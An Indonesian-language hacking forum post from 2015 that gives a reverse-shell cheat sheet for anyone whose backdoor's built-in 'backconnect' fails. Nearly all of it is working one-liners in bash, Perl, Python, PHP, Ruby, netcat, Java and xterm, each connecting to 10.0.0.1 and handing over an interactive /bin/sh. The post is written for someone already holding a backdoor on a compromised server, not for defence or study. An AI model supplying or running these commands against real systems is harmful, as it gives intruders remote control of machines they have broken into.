10-15-2015, 12:39 AM
banyak cara menuju roma, banyak cara menuju connect back ? backconnect ? apalah itu
apabila anda mengalami gagal dalam melakukan backconnect dengan netsploit yang ada di backdoor anda, jangan berkecil hati. berikut banyak cara untuk melakukan backconnect.
sekian
apabila anda mengalami gagal dalam melakukan backconnect dengan netsploit yang ada di backdoor anda, jangan berkecil hati. berikut banyak cara untuk melakukan backconnect.
Code:
menggunakan BASH
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
menggunakan PERL
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
menggunakan PYTHON
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
menggunakan PHP
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
menggunakan RUBY
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
menggunakan NETCAT
nc -e /bin/sh 10.0.0.1 1234
menggunakan JAVA
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
menggunakan XTERM
xterm -display 10.0.0.1:1
sekian